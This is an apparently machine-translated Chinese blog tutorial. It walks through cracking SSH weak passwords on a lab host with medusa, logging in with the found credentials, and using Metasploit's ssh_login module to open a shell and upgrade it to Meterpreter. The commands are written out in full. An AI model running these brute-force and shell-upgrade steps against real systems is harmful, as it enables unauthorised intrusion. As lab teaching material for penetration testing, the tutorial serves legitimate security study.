当前位置:网站首页>6-5 vulnerability exploitation SSH weak password cracking and utilization
6-5 vulnerability exploitation SSH weak password cracking and utilization
2022-07-04 04:42:00 【Mountain Rabbit 1】
After cracking the password , Get the corresponding user name , You can use ssh Client software , Log in accordingly , After login , We can do many operations , get shell, stay shell among , You can execute the corresponding command
Medusa ssh Weak password cracking
If you are setting SSH The service , The administrator set the user name and password that can be easily guessed out for the convenience of memory ( Weak password ). Then the tester can use the corresponding password tools to authenticate and brutally crack weak passwords , Or the process of cracking the user name and password at the same time . So as to get some user names and passwords that are easy to guess , After cracking it, you can log in to the system with the corresponding user name and password ssh
Weak password cracking , Verified a saying , Flies don't bite seamless eggs , Because we set a weak password , It is likely to be cracked , For our convenience , This leads to the defects of the system , It's very inappropriate
Let's introduce medusa For the specified ssh Service to crack user name and password
medusa -h 192.168.1.100 -u msfadmin -p msfadmin -M ssh
adopt -M Specify the service to crack , appear success Indicates successful cracking , without , It means that our dictionary does not contain a user name and password combination of our login system
First of all, we ping Check the target server
ping 192.168.1.100
medusa
// View help information
medusa -d
adopt -d Here's a list of , Modules or protocols we know , When we crack , We want to get rid of .mod, direct ssh Can
medusa -h 192.168.1.100 -u msfadmin -P /root/Desktop/pass.txt -M ssh
This is the time , Try our password every time , Whether it matches the corresponding user name
SSH Command line tool login
use ssh Client login ssh service , To operate , When there is no graphical interface , We completely need to rely on the command line , Or is it linux Built-in tools , To operate , Complete the operation more efficiently
In general Linux All have ssh client , Used to log in ssh Server side
have access to ssh user name @IP Address Then enter the password according to the prompt
By default 22 Port no. , We don't need to specify the corresponding port , Of course , If our ssh Ports are other ports , We just need -p Specify the corresponding port number
ssh [email protected]
msfadmin
id
ifconfig
After login , You can execute some commands , He just used ssh Service login
Metasploit utilize SSH Login bounce shell
Use Metasploit Can be done ssh Sign in ( According to the result of cracking , Automatic login ), The corresponding Bash shell Connect .
medusa Only crack , And ours metasploit The corresponding result will be returned , So that we can execute orders , He combined medusa and ssh Such an operation of the client
set rhosts 192.168.1.100
set username msfadmin
set password msfadmin
run
sessions -l
msfconsole
//metasploit Command line controlled terminal
use auxiliary/scanner/ssh/ssh_login
show options
set rhosts 192.168.1.100
set username msfadmin
show options
set password msfadmin
show options
run
sessions -l
sessions -i 1
id
ifconfig
Metasploit obtain Meterperter shell
Using the obtained Bash shell, Inject Metasploit in Meterpreter payload So as to obtain more powerful shell.
sessions -u 1
// Enter the id, Will inject the corresponding meterpreter payload
sessions -l
// Use session -l To view the
sessions -i 3
// Enter the corresponding payload id Connect
id
pwd
边栏推荐
- 戳气球和布尔运算问题(巨难)
- “找工作不要太在意工资”,这是我听过最大的谎言
- 精品网址导航主题整站源码 wordpress模板 自适应手机端
- What should a novice pay attention to when looking for an escort
- 6-5漏洞利用-SSH弱口令破解利用
- Imitation of "game bird" source code, mobile game issue evaluation, open service, open test collection, game download website template
- Kivy tutorial 07 component and attribute binding implementation button button click to modify the label component (tutorial includes source code)
- Use NRM and NVM to manage your NPM source and node versions
- ADB tools
- [microservices openfeign] two degradation methods of feign | fallback | fallbackfactory
猜你喜欢
Beipiao programmer, 20K monthly salary, 15W a year, normal?
leetcode:1314. 矩阵区域和【二维前缀和模板】
附件五:攻击过程简报.docx
分布式CAP理论
[cloud native] those lines of code that look awesome but have a very simple principle
UnicodeDecodeError: ‘gbk‘ codec can‘t decode byte 0x98 in position 1093: illegal multibyte sequence
关闭的数据能用dbca删除吗? 能
Experience sharing of epidemic telecommuting | community essay solicitation
多位科技公司创始人向Entrepreneur First提供高达1.58亿美元的C轮融资,协助其投资下一代全球创新者
Balloon punching and Boolean operation problems (extremely difficult)
随机推荐
How do good test / development programmers practice? Where to go
GUI application: socket network chat room
通过dd创建asm disk
Change the background color of Kivy tutorial (tutorial includes source code)
Leader: who uses redis expired monitoring to close orders and get out of here!
Eig launched Grupo Cerro, a renewable energy platform in Chile
Kivy教程之 07 组件和属性绑定实现按钮button点击修改label组件(教程含源码)
旭化成首次参展第五届中国国际进口博览会(5th CIIE)
Deep parsing structured exception handling (SEH) - by Matt Pietrek
MySQL JDBC编程
Keysight n9320b RF spectrum analyzer solves tire pressure monitoring scheme
The "functional art" jointly created by Bolang and Virgil abloh in 2021 to commemorate the 100th anniversary of Bolang brand will debut during the exhibition of abloh's works in the museum
Y55. Chapter III kubernetes from entry to proficiency -- HPA controller and metrics server (28)
Operate the server remotely more gracefully: the practice of paramiko Library
最长递增子序列问题(你真的会了吗)
[microservices openfeign] two degradation methods of feign | fallback | fallbackfactory
十字路口通行优先权,十字路口通行规则图解
Developing mqtt access program under QT
苹果CMS仿西瓜视频大气响应式视频模板源码
精品网址导航主题整站源码 wordpress模板 自适应手机端